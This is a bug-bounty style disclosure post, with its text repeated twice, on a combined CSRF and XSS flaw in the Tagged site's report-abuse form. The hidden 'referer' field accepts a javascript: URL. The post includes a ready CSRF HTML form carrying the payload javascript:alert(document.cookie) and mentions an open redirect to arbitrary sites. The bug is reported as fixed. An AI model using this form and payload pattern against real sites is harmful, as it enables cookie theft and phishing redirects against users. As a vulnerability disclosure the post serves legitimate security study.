XSS+CSRF attack in Tagged using Redirect parameter(Open URL Redirection attack Possible)
Hi guys,
Today i want to show you how you can combine XSS and CSRF attack.This is very interesting but pretty difficult to find and create a POC.
Bug type : XSS+CSRF
Bug category : XSS,CSRF
OWASP link :
1.https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)
2.https://www.owasp.org/index.php/Top_10_2013-A8-Cross-Site_Request_Forgery_(CSRF)
Description : In tagged you can report spam/abuse on any user.In HTTP POST request you will find a hidden parameter called "Referer" .This URL is used to redirect to you the URL you provide.You can also attack victim to Redirection attack to any website.
Now in Javascript when you give referrer as any URL,It will redirect you to given URL by you.But when you put javascript:alert(1) as a URL it will execute the code which you provide.
Attack Steps :
1. Create a CSRF POC where you will give XSS payload javascript:alert(1)
2.Click on the Button and you will get XSS pop up
3.You can also redirect victim to any malicious URL by putting URL in referrer.
XSS parameter used : javascript:alert(document.cookie) in referrer
Proxy Tool used : BurpSuite
HTML Code for CSRF:
<html>
<body>
<form action="http://m.tagged.com/report_abuse.html "method="POST">
<input type ="hidden" name="report_userId" value="6025854846">
<input type="hidden" name="referer" value="javascript:alert(document.cookie)">
<input type="hidden" name ="contentId" value="1436985861035340" >
<input type="hidden" name ="reason" value="threads" >
<input type="submit">
</form>
</body>
</html>
Video POC :
Status : Fixed
Today i want to show you how you can combine XSS and CSRF attack.This is very interesting but pretty difficult to find and create a POC.
Bug type : XSS+CSRF
Bug category : XSS,CSRF
OWASP link :
1.https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)
2.https://www.owasp.org/index.php/Top_10_2013-A8-Cross-Site_Request_Forgery_(CSRF)
Description : In tagged you can report spam/abuse on any user.In HTTP POST request you will find a hidden parameter called "Referer" .This URL is used to redirect to you the URL you provide.You can also attack victim to Redirection attack to any website.
Now in Javascript when you give referrer as any URL,It will redirect you to given URL by you.But when you put javascript:alert(1) as a URL it will execute the code which you provide.
Attack Steps :
1. Create a CSRF POC where you will give XSS payload javascript:alert(1)
2.Click on the Button and you will get XSS pop up
3.You can also redirect victim to any malicious URL by putting URL in referrer.
XSS parameter used : javascript:alert(document.cookie) in referrer
Proxy Tool used : BurpSuite
HTML Code for CSRF:
<html>
<body>
<form action="http://m.tagged.com/report_abuse.html "method="POST">
<input type ="hidden" name="report_userId" value="6025854846">
<input type="hidden" name="referer" value="javascript:alert(document.cookie)">
<input type="hidden" name ="contentId" value="1436985861035340" >
<input type="hidden" name ="reason" value="threads" >
<input type="submit">
</form>
</body>
</html>
Video POC :
Status : Fixed
Comments
Post a comment